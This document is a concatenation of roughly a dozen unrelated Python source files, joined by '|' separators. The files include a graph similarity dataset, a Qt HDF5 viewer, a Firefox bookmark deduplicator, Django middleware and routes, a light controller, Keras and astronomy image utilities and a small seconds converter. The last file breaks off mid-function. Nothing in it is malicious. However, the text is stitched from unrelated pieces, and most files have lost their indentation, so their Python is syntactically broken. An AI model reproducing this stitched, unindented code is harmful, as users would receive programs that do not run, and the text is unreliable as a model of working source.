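# finder.password = "secret"
# finder.deviceName = "My iPhone"
# loc = finder.getLocation()   # [latitude, longitude, horizontalAccuracy, altitude] or None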
|
import abc
import contextlib
import random
import collections
import copy
import numpy as np
import networkx as nx
"""A general Interface"""
class GraphSimilarityDataset(object):
"""Base class for all the graph similarity learning datasets.
This class defines some common interfaces a graph similarity dataset can have,
in particular the functions that creates iterators over pairs and triplets.
"""
@abc.abstractmethod
def triplets(self, batch_size):
"""Create an iterator over triplets.
Args:
batch_size: int, number of triplets in a batch.
Yields:
graphs: a `GraphData` instance. The batch of triplets put together. Each
triplet has 3 graphs (x, y, z). Here the first graph is duplicated once
so the graphs for each triplet are ordered as (x, y, x, z) in the batch.
The batch contains `batch_size` number of triplets, hence `4*batch_size`
many graphs.
"""
pass
@abc.abstractmethod
def pairs(self, batch_size):
"""Create an iterator over pairs.
Args:
batch_size: int, number of pairs in a batch.
Yields:
graphs: a `GraphData` instance. The batch of pairs put together. Each
pair has 2 graphs (x, y). The batch contains `batch_size` number of
pairs, hence `2*batch_size` many graphs.
labels: [batch_size] int labels for each pair, +1 for similar, -1 for not.
"""
pass
"""Graph Edit Distance Task"""
# Graph Manipulation Functions
def permute_graph_nodes(g):
"""Permute node ordering of a graph, returns a new graph."""
n = g.number_of_nodes()
new_g = nx.Graph()
new_g.add_nodes_from(range(n))
perm = np.random.permutation(n)
edges = g.edges()
new_edges = []
for x, y in edges:
new_edges.append((perm[x], perm[y]))
new_g.add_edges_from(new_edges)
return new_g
def substitute_random_edges(g, n):
"""Substitutes n edges from graph g with another n randomly picked edges."""
g = copy.deepcopy(g)
n_nodes = g.number_of_nodes()
edges = list(g.edges())
# sample n edges without replacement
e_remove = [
edges[i] for i in np.random.choice(np.arange(len(edges)), n, replace=False)
]
edge_set = set(edges)
e_add = set()
while len(e_add) < n:
e = np.random.choice(n_nodes, 2, replace=False)
# make sure e does not exist and is not already chosen to be added
if (
(e[0], e[1]) not in edge_set
and (e[1], e[0]) not in edge_set
and (e[0], e[1]) not in e_add
and (e[1], e[0]) not in e_add
):
e_add.add((e[0], e[1]))
for i, j in e_remove:
g.remove_edge(i, j)
for i, j in e_add:
g.add_edge(i, j)
return g
class GraphEditDistanceDataset(GraphSimilarityDataset):
"""Graph edit distance dataset."""
def __init__(
self,
n_nodes_range,
p_edge_range,
n_changes_positive,
n_changes_negative,
permute=True,
):
"""Constructor.
Args:
n_nodes_range: a tuple (n_min, n_max). The minimum and maximum number of
nodes in a graph to generate.
p_edge_range: a tuple (p_min, p_max). The minimum and maximum edge
probability.
n_changes_positive: the number of edge substitutions for a pair to be
considered positive (similar).
n_changes_negative: the number of edge substitutions for a pair to be
considered negative (not similar).
permute: if True (default), permute node orderings in addition to
changing edges; if False, the node orderings across a pair or triplet of
graphs will be the same, useful for visualization.
"""
self._n_min, self._n_max = n_nodes_range
self._p_min, self._p_max = p_edge_range
self._k_pos = n_changes_positive
self._k_neg = n_changes_negative
self._permute = permute
def _get_graph(self):
"""Generate one graph."""
n_nodes = np.random.randint(self._n_min, self._n_max + 1)
p_edge = np.random.uniform(self._p_min, self._p_max)
# do a little bit of filtering
n_trials = 100
for _ in range(n_trials):
g = nx.erdos_renyi_graph(n_nodes, p_edge)
if nx.is_connected(g):
return g
raise ValueError("Failed to generate a connected graph.")
def _get_pair(self, positive):
"""Generate one pair of graphs."""
g = self._get_graph()
if self._permute:
permuted_g = permute_graph_nodes(g)
else:
permuted_g = g
n_changes = self._k_pos if positive else self._k_neg
changed_g = substitute_random_edges(g, n_changes)
return permuted_g, changed_g
def _get_triplet(self):
"""Generate one triplet of graphs."""
g = self._get_graph()
if self._permute:
permuted_g = permute_graph_nodes(g)
else:
permuted_g = g
pos_g = substitute_random_edges(g, self._k_pos)
neg_g = substitute_random_edges(g, self._k_neg)
return permuted_g, pos_g, neg_g
def triplets(self, batch_size):
"""Yields batches of triplet data."""
while True:
batch_graphs = []
for _ in range(batch_size):
g1, g2, g3 = self._get_triplet()
batch_graphs.append((g1, g2, g1, g3))
yield self._pack_batch(batch_graphs)
def pairs(self, batch_size):
"""Yields batches of pair data."""
while True:
batch_graphs = []
batch_labels = []
positive = True
for _ in range(batch_size):
g1, g2 = self._get_pair(positive)
batch_graphs.append((g1, g2))
batch_labels.append(1 if positive else -1)
positive = not positive
packed_graphs = self._pack_batch(batch_graphs)
labels = np.array(batch_labels, dtype=np.int32)
yield packed_graphs, labels
def _pack_batch(self, graphs):
"""Pack a batch of graphs into a single `GraphData` instance.
Args:
graphs: a list of generated networkx graphs.
Returns:
graph_data: a `GraphData` instance, with node and edge indices properly
shifted.
"""
Graphs = []
for graph in graphs:
for inergraph in graph:
Graphs.append(inergraph)
graphs = Graphs
from_idx = []
to_idx = []
graph_idx = []
n_total_nodes = 0
n_total_edges = 0
for i, g in enumerate(graphs):
n_nodes = g.number_of_nodes()
n_edges = g.number_of_edges()
edges = np.array(g.edges(), dtype=np.int32)
# shift the node indices for the edges
from_idx.append(edges[:, 0] + n_total_nodes)
to_idx.append(edges[:, 1] + n_total_nodes)
graph_idx.append(np.ones(n_nodes, dtype=np.int32) * i)
n_total_nodes += n_nodes
n_total_edges += n_edges
GraphData = collections.namedtuple('GraphData', [
'from_idx',
'to_idx',
'node_features',
'edge_features',
'graph_idx',
'n_graphs'])
return GraphData(
from_idx=np.concatenate(from_idx, axis=0),
to_idx=np.concatenate(to_idx, axis=0),
# this task only cares about the structures, the graphs have no features.
# setting higher dimension of ones to confirm code functioning
# with high dimensional features.
node_features=np.ones((n_total_nodes, 8), dtype=np.float32),
edge_features=np.ones((n_total_edges, 4), dtype=np.float32),
graph_idx=np.concatenate(graph_idx, axis=0),
n_graphs=len(graphs),
)
# Use Fixed datasets for evaluation
@contextlib.contextmanager
def reset_random_state(seed):
"""This function creates a context that uses the given seed."""
np_rnd_state = np.random.get_state()
rnd_state = random.getstate()
np.random.seed(seed)
random.seed(seed + 1)
try:
yield
finally:
random.setstate(rnd_state)
np.random.set_state(np_rnd_state)
class FixedGraphEditDistanceDataset(GraphEditDistanceDataset):
"""A fixed dataset of pairs or triplets for the graph edit distance task.
This dataset can be used for evaluation.
"""
def __init__(
self,
n_nodes_range,
p_edge_range,
n_changes_positive,
n_changes_negative,
dataset_size,
permute=True,
seed=1234,
):
super(FixedGraphEditDistanceDataset, self).__init__(
n_nodes_range,
p_edge_range,
n_changes_positive,
n_changes_negative,
permute=permute,
)
self._dataset_size = dataset_size
self._seed = seed
def triplets(self, batch_size):
"""Yield triplets."""
if hasattr(self, "_triplets"):
triplets = self._triplets
else:
# get a fixed set of triplets
with reset_random_state(self._seed):
triplets = []
for _ in range(self._dataset_size):
g1, g2, g3 = self._get_triplet()
triplets.append((g1, g2, g1, g3))
self._triplets = triplets
ptr = 0
while ptr + batch_size <= len(triplets):
batch_graphs = triplets[ptr: ptr + batch_size]
yield self._pack_batch(batch_graphs)
ptr += batch_size
def pairs(self, batch_size):
"""Yield pairs and labels."""
if hasattr(self, "_pairs") and hasattr(self, "_labels"):
pairs = self._pairs
labels = self._labels
else:
# get a fixed set of pairs first
with reset_random_state(self._seed):
pairs = []
labels = []
positive = True
for _ in range(self._dataset_size):
pairs.append(self._get_pair(positive))
labels.append(1 if positive else -1)
positive = not positive
labels = np.array(labels, dtype=np.int32)
self._pairs = pairs
self._labels = labels
ptr = 0
while ptr + batch_size <= len(pairs):
batch_graphs = pairs[ptr: ptr + batch_size]
packed_batch = self._pack_batch(batch_graphs)
yield packed_batch, labels[ptr: ptr + batch_size]
ptr += batch_size
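# Hedged usage sketch (not part of the original module; parameter values are illustrative):
if __name__ == "__main__":
    dataset = GraphEditDistanceDataset(
        n_nodes_range=(10, 20),   # graphs with 10-20 nodes
        p_edge_range=(0.2, 0.5),  # Erdos-Renyi edge probability range
        n_changes_positive=1,     # 1 edge substitution -> similar pair
        n_changes_negative=2,     # 2 edge substitutions -> dissimilar pair
    )
    batch, labels = next(dataset.pairs(batch_size=4))
    # 4 pairs are packed into one GraphData instance (8 graphs); labels alternate +1/-1
    print(batch.n_graphs, labels)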
|
#!/usr/bin/env python
# coding: utf-8
"""
QMainWindow based on :mod:`silx.examples.customHdf5TreeModel`
"""
import os
from silx.gui import qt
from sloth import _resourcesPath
from .view import TreeView
from .model import TreeModel
from sloth.gui.plot.plotarea import PlotArea # sloth version
from sloth.gui.console import InternalIPyKernel
from sloth.utils.logging import getLogger
logger = getLogger('sloth.gui.daxs.windowHdf5Tree')
class MainWindowHdf5Tree(qt.QMainWindow):
"""MainWindow based on Hdf5TreeView
"""
def __init__(self, app, parent=None, with_ipykernel=True):
"""
Constructor
"""
super(MainWindowHdf5Tree, self).__init__(parent=parent)
self._app = app
self._with_ipykernel = with_ipykernel
"""Store main application and IPython kernel status"""
self._menuBar = qt.QMenuBar()
self.setMenuBar(self._menuBar)
self._initAppMenu()
"""Add minimal menu bar with Quit action"""
ico = qt.QIcon(os.path.join(_resourcesPath, "logo",
"xraysloth_logo_04.svg"))
self.setWindowIcon(ico)
self.setWindowTitle("sloth-daxs")
"""Set window title and icon"""
self._view = TreeView(self)
"""Inherited from SILX TreeView view"""
self._model = TreeModel()
"""Inherited from SILX TreeModel model
.. note:: in silx.examples.customHdf5TreeModel there are two options:
- original model::
# in __init__
self.__treeview = Hdf5TreeView()
self.__sourceModel = self.__treeview.model()
# in __useOriginalModel
self.__treeview.setModel(self.__sourceModel)
- custom model::
# in __init__
self.__treeview = Hdf5TreeView()
self.__sourceModel = self.__treeview.model()
# in __useCustomModel
customModel = CustomTooltips(self.__treeview)
# CustomTooltips is qt.QIdentityProxyModel
customModel.setSourceModel(self.__sourceModel)
self.__treeview.setModel(customModel)
"""
self._view.setModel(self._model)
"""Set the model to the view"""
self._plotArea = PlotArea()
self.setCentralWidget(self._plotArea)
"""Plot Area storing all plot windows"""
self._dockWidget = qt.QDockWidget(parent=self)
self._dockWidget.setObjectName('Data TreeView')
self._dockWidget.setWidget(self._view)
self.addDockWidget(qt.Qt.TopDockWidgetArea, self._dockWidget)
"""TreeView dock widget"""
if self._with_ipykernel:
# Initialize internal ipykernel
self._ipykernel = InternalIPyKernel()
self._ipykernel.init_kernel(backend='qt')
"""IPython kernel part of the GUI application (= internal)"""
self._ipykernel.add_to_namespace('app', self)
self._ipykernel.add_to_namespace('view', self._view)
self._ipykernel.add_to_namespace('model', self._model)
self._ipykernel.add_to_namespace('plot', self._plotArea)
"""Namespaces added to the kernel are visible in the consoles"""
self._initConsoleMenu()
"""Add console menu"""
else:
self._ipykernel = None
if self._ipykernel is not None:
self._ipykernel.new_qt_console()
"""Open one console"""
self._plotArea.addPlotWindow()
"""Add one plot window"""
def showEvent(self, event):
self.loadSettings()
super(MainWindowHdf5Tree, self).showEvent(event)
def closeEvent(self, event):
self.saveSettings()
super(MainWindowHdf5Tree, self).closeEvent(event)
def loadSettings(self):
"""TODO"""
pass
def saveSettings(self):
"""TODO"""
pass
# Populate the menu bar with common actions and shortcuts
def _addMenuAction(self, menu, action, deferShortcut=False):
"""Add action to menu as well as self so that when the menu bar is
invisible, its actions are still available. If deferShortcut
is True, set the shortcut context to widget-only, where it
will avoid conflict with shortcuts already bound to the
widgets themselves.
"""
menu.addAction(action)
self.addAction(action)
if deferShortcut:
action.setShortcutContext(qt.Qt.WidgetShortcut)
else:
action.setShortcutContext(qt.Qt.ApplicationShortcut)
def _initAppMenu(self):
"""Add application menu"""
self._menuApp = self._menuBar.addMenu("Application")
self._closeAppAction = qt.QAction("&Quit", self, shortcut="Ctrl+Q",
triggered=self.onClose)
self._addMenuAction(self._menuApp, self._closeAppAction)
def _initConsoleMenu(self):
self._menuConsole = self._menuBar.addMenu("Console")
self._newConsoleAction = qt.QAction("&New Qt Console",
self, shortcut="Ctrl+K",
triggered=self._ipykernel.new_qt_console)
self._addMenuAction(self._menuConsole, self._newConsoleAction)
def onClose(self):
if self._ipykernel is not None:
self._ipykernel.cleanup_consoles()
        self.close()
|
"""Extract and merge links from HTML bookmarks files exported from Firefox.
A Firefox bookmarks file doesn't make bookmarks available in a form that's easy to work with.
This tool solves that problem.
"""
import json
import sys
from bs4 import BeautifulSoup
import click
def firefox_link(address, name, attrs):
return {
'address': address,
'name': name,
'attrs': attrs
}
def bookmark_folder(folder_name, bookmarks):
return {
'folder_name': folder_name,
'bookmarks': bookmarks
}
def bookmarks_to_html(bookmarks):
header = """<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Bookmarks Menu</H1>
<dl><p>"""
contents = [bookmark_to_html(bookmark) for bookmark in bookmarks]
footer = "</dl>"
return '\n'.join([header] + contents + [footer])
def bookmark_to_html(bookmark):
if 'address' in bookmark:
return firefox_link_to_html(bookmark)
elif 'bookmarks' in bookmark:
return bookmark_folder_to_html(bookmark)
raise ValueError('Unhandled bookmark type')
def firefox_link_to_html(link):
tags = " ".join(
[f'href="{link["address"]}"'] +
[f'{attr}="{value}"' for attr, value in link['attrs'].items()]
)
return f'<dt><a {tags}>{link["name"]}</a>'
def bookmark_folder_to_html(folder):
# TODO the header also has ADD_DATE, LAST_MODIFIED, but I don't care much about those things.
header = f'<dt><h3>{folder["folder_name"]}</h3>'
start = '<dl><p>'
contents = [bookmark_to_html(bookmark) for bookmark in folder['bookmarks']]
end = '</dl><p>'
return '\n'.join([header, start] + contents + [end])
def parse_bookmarks(root):
"""Parse the tree of bookmarks from an HTML bookmark file exported from Firefox.
The doctype of this file claims to be "NETSCAPE-Bookmark-file-1".
"""
bookmarks = []
for e in root.find_all('dt', recursive=False):
for link in e.find_all('a', recursive=False):
bookmarks.append(firefox_link(
link.get('href'),
link.string,
{attr: link.get(attr) for attr in link.attrs if attr != 'href'},
))
for folder in e.find_all('h3', recursive=False):
folder_name = folder.string
folder_dl = folder.find_next_sibling('dl')
bookmarks.append(bookmark_folder(
folder_name,
parse_bookmarks(folder_dl)
))
return bookmarks
def parse_bookmarks_from_html(filename):
with open(filename) as f:
soup = BeautifulSoup(f, 'html5lib')
return parse_bookmarks(soup.find('dl'))
def bookmark_addresses(bookmarks):
"""Generate addresses from a parsed tree of bookmarks."""
# A bookmark is either a firefox_link or a bookmark_folder
for bookmark in bookmarks:
if 'address' in bookmark:
yield bookmark['address']
elif 'bookmarks' in bookmark:
yield from bookmark_addresses(bookmark['bookmarks'])
def remove_duplicate_bookmarks(bookmarks, addresses):
"""Remove duplicate addresses from a tree of bookmarks."""
out_bookmarks = []
for bookmark in bookmarks:
if 'address' in bookmark:
if bookmark['address'] in addresses:
print(f'Dupe: {bookmark["address"]}', file=sys.stderr)
elif bookmark['address'].startswith('place:'):
# Skip recents and other autogenerated bookmark lists
continue
else:
out_bookmarks.append(bookmark)
elif 'bookmarks' in bookmark:
deduped = remove_duplicate_bookmarks(bookmark['bookmarks'], addresses)
if deduped:
out_bookmarks.append(bookmark_folder(bookmark['folder_name'], deduped))
return out_bookmarks
@click.group(help=__doc__)
def cli():
pass
@cli.command('extract')
@click.argument('bookmarks_filename')
def click_extract(bookmarks_filename):
"""Extract bookmarks in a bookmarks HTML file to structured JSON."""
print(json.dumps(parse_bookmarks_from_html(bookmarks_filename), indent=4))
@cli.command('prepare-import')
@click.argument('primary_bookmarks_filename')
@click.argument('secondary_bookmarks_filename')
def click_merge(primary_bookmarks_filename, secondary_bookmarks_filename):
"""Prepare secondary bookmarks for import.
Given an HTML bookmarks export from the primary Firefox profile and an HTML bookmarks export
from the secondary Firefox profile, write an HTML file containing bookmarks that appear only in
the secondary profile.
The bookmark folder structure from the secondary file is preserved in a new folder with the
following deduplication operations performed:
- If a bookmark's address also appears in the primary file, it is omitted from the secondary.
- If omissions of bookmarks result in empty folders, the empty folders are pruned.
A new bookmarks file is written out, which can then be imported into the primary Firefox
profile via the Bookmarks Manager. The user can then use the Bookmarks Manager to manipulate
the secondary's folder structure, merging it with the primary with the assurance that doing so
won't result in adding duplicate bookmarks.
"""
primary_bookmarks = parse_bookmarks_from_html(primary_bookmarks_filename)
primary_addresses = set(bookmark_addresses(primary_bookmarks))
secondary_bookmarks = parse_bookmarks_from_html(secondary_bookmarks_filename)
deduplicated_secondary_bookmarks = remove_duplicate_bookmarks(
secondary_bookmarks, primary_addresses)
print(bookmarks_to_html(deduplicated_secondary_bookmarks))
if __name__ == '__main__':
cli()
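# Hedged CLI examples (file names are placeholders):
#   python bookmarks.py extract bookmarks.html > bookmarks.json
#   python bookmarks.py prepare-import primary.html secondary.html > secondary_deduped.html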
|
"""Registering translated models for the ``cmsplugin_blog_seo_addons`` app."""
from simple_translation.translation_pool import translation_pool
from .models import SEOAddon, SEOAddonTranslation
translation_pool.register_translation(SEOAddon, SEOAddonTranslation)
|
#!/usr/bin/env python3
# This file turns a note's file name into an Obsidian URL by combining it with the URL scheme provided by Obsidian
vaultURL = "obsidian://open?vault=Knowledge%20Base&file=52%20-%20Memory%20Base%2F"
def generate(title):
title = encode(title)
title = vaultURL + title
return title
def encode(string):
string = str(string.encode("utf-8"))
string = string.replace("\\x", "%")
string = string.replace(" ", "%20")
string = string.replace("/", "%2F")
string = string.lstrip("\'b")
string = string.rstrip("\'")
string = capitalize_unicode(string)
return string
def capitalize_unicode(string):
new = []
position = -5
for index in range(0, len(string)):
if string[index] == "%":
position = index
new.append(string[index])
elif index == position + 1 or index == position + 2:
new.append(string[index].capitalize())
else:
new.append(string[index])
return "".join(new)
|
from apps.core.errors import ProblemDetailException, ValidationException
from apps.api.response import ErrorResponse, ValidationResponse
class ExceptionMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
return self.get_response(request)
@staticmethod
def process_exception(request, exception):
if isinstance(exception, ProblemDetailException):
return ErrorResponse.create_from_exception(exception)
if isinstance(exception, ValidationException):
return ValidationResponse.create_from_exception(exception)
__all__ = [
'ExceptionMiddleware'
]
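# Hedged usage note: enable by adding this class to Django's MIDDLEWARE setting
# (the dotted path below is illustrative and depends on where this module lives):
# MIDDLEWARE = [
#     ...,
#     'apps.core.middleware.ExceptionMiddleware',
# ]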
|
################################################################################################################################
# *** Copyright Notice ***
#
# "Price Based Local Power Distribution Management System (Local Power Distribution Manager) v1.0"
# Copyright (c) 2016, The Regents of the University of California, through Lawrence Berkeley National Laboratory
# (subject to receipt of any required approvals from the U.S. Dept. of Energy). All rights reserved.
#
# If you have questions about your rights to use or distribute this software, please contact
# Berkeley Lab's Innovation & Partnerships Office at IPO@lbl.gov.
################################################################################################################################
"""
Implementation of a PWM and beaglebone based EUD device.
"""
import os
with open("/tmp/LPDM_light_pythonpath", "a") as f:
f.write("{p}\n".format(p=os.environ["PYTHONPATH"].split(os.pathsep)))
#from eud import Eud
from device.simulated.eud import Eud
from philips_lights.light_driver import Light_Driver
from common.smap_tools.smap_tools import download_most_recent_point
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
import json
class Philips_Light(Eud):
def __init__(self, config = None):
self._device_type = "philips_light"
# Call super constructor
Eud.__init__(self, config)
self._smap_info = config.get("smap", None)
self._current_light_level = None
self.light_server_info = config.get("light_server")
url = self.light_server_info.get("url")
username = self.light_server_info.get("user")
pw = self.light_server_info.get("password")
self.driver = Light_Driver(url, (username, pw))
def on_price_change(self, source_device_id, target_device_id, time, new_price):
# just doing 1-price to get light level. Light level should be between 0 and 1
# and prices are currently between 0 and 1 so this works for the experiment
# but will need to be changed if/when the range values price can take changes.
self.set_light_level(1.0 - new_price)
# return flow to the rest of the LPDM stack
super(Philips_Light, self).on_price_change(source_device_id, target_device_id, time, new_price)
def lookup_power(self):
if self._smap_info:
stream_info = self._smap_info.get("power", None)
if stream_info:
_, ts, value = download_most_recent_point(stream_info["smap_root"], stream_info["stream"])
return value
def on_time_change(self, new_time):
power_use = self.lookup_power()
self.broadcast_new_power(power_use)
super(Philips_Light, self).on_time_change(new_time)
def set_light_level(self, light_level):
res = self.driver.set_light_level(light_level)
return res
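# Hedged example of the expected config dict (keys inferred from __init__ above, values are placeholders):
# config = {
#     "light_server": {"url": "http://bridge.example/api", "user": "admin", "password": "secret"},
#     "smap": {"power": {"smap_root": "http://smap.example", "stream": "/philips_light/power"}},
# }
# light = Philips_Light(config)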
|
import hashlib
import os
def read_in_chunks(file_object, chunk_size=1024):
while True:
data = file_object.read(chunk_size)
if not data:
break
yield data
def touch(fname, times=None):
with open(fname, 'a'):
os.utime(fname, times)
def hash_bytestr_iter(bytesiter, hasher):
for block in bytesiter:
hasher.update(block)
return hasher.hexdigest()
def file_as_blockiter(afile, blocksize=65536):
with afile:
block = afile.read(blocksize)
while len(block) > 0:
yield block
block = afile.read(blocksize)
def sha256(path):
block_iter = file_as_blockiter(open(path, "rb"))
hasher = hashlib.sha256()
return hash_bytestr_iter(block_iter, hasher)
class File(object):
def __init__(self, path):
if path and not os.path.exists(path):
touch(path)
self.path = path
def open(self, mode="r"):
return open(self.path, mode)
def __len__(self):
return os.stat(self.path).st_size
def __iadd__(self, other):
with open(self.path, "ab") as us:
with open(other.path, "rb") as them:
for chunk in read_in_chunks(them, 2 ** 16):
us.write(chunk)
return self
def sha256(self):
return sha256(self.path)
def __eq__(self, other):
if self is other:
return True
return self.sha256() == other.sha256()
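# Hedged usage sketch (paths are placeholders):
# a = File("/tmp/a.bin")
# b = File("/tmp/b.bin")
# a += b                       # append b's bytes to a in 64 KiB chunks
# print(len(a), a.sha256())    # size in bytes and SHA-256 hex digest
# print(a == b)                # True only when the digests match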
|
numero = int(input("Por favor, entre com o número de segundos que deseja converter: "))
dias = numero // (3600*24)
numero = numero % (3600*24)
horas = numero // 3600
numero = numero % 3600
minutos = numero // 60
numero = numero % 60
print(dias,"dias,",horas, "horas,",minutos, "minutos e",numero, "segundos.")
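# Worked example: 100000 seconds -> 1 day, 3 hours, 46 minutes and 40 seconds
# (100000 // 86400 = 1, remainder 13600; 13600 // 3600 = 3, remainder 2800;
#  2800 // 60 = 46, remainder 40)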
|
from django.conf.urls import patterns, include, url
from pull.views import *
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'pull.views.home', name='home'),
# url(r'^pull/', include('pull.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^$', NewsListView.as_view()),
url(r'^new/(\d+)/$', NewsSubject),
url(r'^class/(?P<id>\d+)/$', ClassShow.as_view()),
url(r'^admin/', include(admin.site.urls)),
url(r'^p/(?P<path>.*)$', proxy_to),
#url(r'^task/(?P<id>\d+)$', task_to),
url(r'^like/(?P<path>.*)$', like_models),
url(r'^search/(?P<path>.*)$', search_content),
url(r'^dup$', DupListView.as_view()),
url(r'^pic/(?P<path>.*)$', search_pic),
url(r'^test$', test_page),
)
|
from .seq2seq import RNNSeq2Seq
|
import os, cv2
import numpy as np
import tensorflow as tf
from sklearn import preprocessing
class Generator(tf.keras.utils.Sequence):
"""
    This is the data generator class that defines the generator objects used in training and testing the model.
    The purpose of the generator is to yield the images in batches, rather than loading them all into memory at once.
    All of the methods either initialize data or return data through the __getitem__ method, which is the Keras Sequence
    method for generating batches.
"""
#DATASET_PATH is the training directory or the testing directory, not the directory that contains both
def __init__(self, DATASET_PATH, BATCH_SIZE = 2, image_min_side = 50):
#size of the batches that will be generated
self.batch_size = BATCH_SIZE
        #if the image's smallest side is smaller than this, it will be enlarged while keeping its aspect ratio
self.image_min_side = image_min_side
#saving image paths and labels during initialization
ABSOLUTE_DATASET_PATH = os.path.join(os.path.dirname(__file__), '..', '..', DATASET_PATH)
print(f'The Absolute Dataset Path is: {ABSOLUTE_DATASET_PATH}')
self.load_image_paths_and_labels(ABSOLUTE_DATASET_PATH)
self.create_image_groups()
def load_image_paths_and_labels(self, ABSOLUTE_DATASET_PATH):
"""
This is used to load a list of image paths and a list of their labels.
This information will be saved to the object during initialization.
"""
#list of paths of class directories within image directory
classes = os.listdir(ABSOLUTE_DATASET_PATH)
#creating lists for image paths and label
self.image_paths = []
self.image_labels = []
#iterating through each class
for class_name in classes:
if class_name == 'popular':
label = 1
if class_name == 'not_popular':
label = 0
if class_name == 'medium':
label = 0.5
if class_name == 'low_medium':
label = 0.25
if class_name == 'high_medium':
label = 0.75
#path for the current class
class_path = os.path.join(ABSOLUTE_DATASET_PATH, class_name)
#iterating through each image in the class
for image_file_name in os.listdir(class_path):
#adding the image path
self.image_paths.append(os.path.join(class_path, image_file_name))
#adding the image label
self.image_labels.append(label)
#transforming all the labels into numbers
self.image_labels = np.array(self.image_labels, dtype='float32')
        #check that image_paths and image_labels have the same length, which is necessary because each label corresponds to an image
assert len(self.image_paths) == len(self.image_labels)
def create_image_groups(self):
"""
This is used to load the image paths and labels into groups.
This information will be saved to the model during initialization.
"""
#shuffle the images
seed = 4321
np.random.seed(seed)
np.random.shuffle(self.image_paths)
np.random.seed(seed)
np.random.shuffle(self.image_labels)
#Divide image_labels and image_paths, based on BATCH_SIZE
self.image_groups = [[self.image_paths[x % len(self.image_paths)] for x in range(i, i + self.batch_size)] for i in range(0, len(self.image_paths), self.batch_size)]
self.label_groups = [[self.image_labels[x % len(self.image_labels)] for x in range(i, i + self.batch_size)] for i in range(0, len(self.image_labels), self.batch_size)]
def resize_image(self, image):
"""
This method ensures that each image's smallest side is greater than image_min_side.
It should be noted that this method works with actual images, not image paths
"""
#getting information about the image
height, width, color = image.shape
smallest = self.image_min_side
        #computing a factor to multiply both sides by, ensuring that the image's smallest side is at least image_min_side while maintaining the aspect ratio
if min(height, width) < self.image_min_side:
multiplier = float(smallest)/height if height < width else float(smallest)/width
else:
multiplier = 1
#multiplying dimensions by multiplier to get new dimensions
new_height = int(height*multiplier)
new_width = int(width*multiplier)
#resizing image
#for some reason, cv2.resize() expects the tuple to be (width, height)
new_image = cv2.resize(image, (new_width, new_height), interpolation=cv2.INTER_AREA)
return new_image
def load_images(self, image_group):
"""
This method uses image paths to load images, and ensures that they meet the requirement of image_min_side.
It also makes the color channel RGB, instead of GRAY, BGRA, or BGR
"""
#initializing list of images in image_group
images = []
#iterating through each image
for image_path in image_group:
#loading image through image path
image = cv2.imread(image_path)
            #working out the colour layout from the array shape: 2 dims means grayscale,
            #otherwise the channel count distinguishes BGRA (4 channels) from BGR (3 channels)
            #converting to RGB
            if len(image.shape) == 2:
                image = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)
            elif image.shape[2] == 4:
                image = cv2.cvtColor(image, cv2.COLOR_BGRA2RGB)
            else:
                image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
#ensuring image meets image_min_side requirement
transformed_image = self.resize_image(image)
images.append(transformed_image)
return images
def construct_image_batch(self, loaded_image_group):
"""
This method uses the loaded image_group from load images to create an image batch.
This is also where images that are smaller than the largest image will have zeros added to fit the model.
"""
#get the shape of the largest image
largest_shape = tuple(max(image.shape[x] for image in loaded_image_group) for x in range(3))
#create an image batch object, with each image being an empty set of pixels the size of the largest image
image_batch = np.zeros((self.batch_size,) + largest_shape, dtype='float32')
#iterate through image_group, using enumerate to access both the image and the index of the image, i.e., (4, '4th_image')
for index, image in enumerate(loaded_image_group):
"""
Filling the image in the batch from the upper left part of image, replacing the empty pixels with pixels from the
actual image. The model will learn to ignore the extra empty space.
"""
image_batch[index, :image.shape[0], :image.shape[1], :image.shape[2]] = image
return image_batch
def __len__(self):
"""
The number of batches in the generator.
This will be called for the len() function
"""
return len(self.image_groups)
def __getitem__(self, index):
"""
This is the Keras sequence method for generating batches, all of the code builds up to this point
"""
        #getting 1 group of images and its labels
image_group = self.image_groups[index]
label_group = self.label_groups[index]
#converting the image group (image paths) into images
loaded_images = self.load_images(image_group)
        #creating the zero-padded image batch from the loaded images
image_batch = self.construct_image_batch(loaded_images)
#The culmination of all the work put into this file!
return np.array(image_batch), np.array(label_group)
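# Hedged usage sketch (directory layout and model are illustrative, not defined in this module):
# train_generator = Generator('data/train', BATCH_SIZE=2, image_min_side=50)
# image_batch, label_batch = train_generator[0]   # one zero-padded batch of images and labels
# model.fit(train_generator, epochs=10)           # any compiled tf.keras model taking RGB images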
|
r"""General utilities for Hypothesis."""
import hypothesis
import numpy as np
import torch
def is_iterable(item):
return hasattr(item, "__getitem__")
|
"""This submodule serves the purpose of preparing the frames
for further processing.
"""
import os
from .process import DSLRImage, Color, ImageType, isRaw
from .calibrate import calibrate
import numpy as np
__all__ = ["sort"]
def __listdir(path):
# optimizes the os.listdir function
return [
path + '/' + d for d in os.listdir(path)
if os.path.isfile(path + '/' + d)
]
def __listraw(path):
return [f for f in __listdir(path) if isRaw(f)]
def sort(path, red=False, green=True, blue=False, binX=None, binY=None):
"""Initializes DSLRImage classes for each frame,
then bins them and stores specified monochrome images to FITS.
"""
if binY is None:
binY = binX
lights = [
DSLRImage(f, itype=ImageType.LIGHT)
for f in __listraw(path + "/Light_frames")
]
bias = [
DSLRImage(f, itype=ImageType.BIAS)
for f in __listraw(path + "/Bias_frames")
]
darks = [
DSLRImage(f, itype=ImageType.DARK)
for f in __listraw(path + "/Dark_frames")
]
flats = [
DSLRImage(f, itype=ImageType.FLAT)
for f in __listraw(path + "/Flat_fields")
]
    imagesR = np.array([])
    imagesG = np.array([])
    imagesB = np.array([])
if(red):
clights = np.array([im.extractChannel(Color.RED) for im in lights])
cbias = np.array([im.extractChannel(Color.RED) for im in bias])
cflats = np.array([im.extractChannel(Color.RED) for im in flats])
cdarks = np.array([im.extractChannel(Color.RED) for im in darks])
calibrate(clights, cbias, cdarks, cflats)
imagesR = clights
if(green):
clights = np.array([im.extractChannel(Color.GREEN) for im in lights])
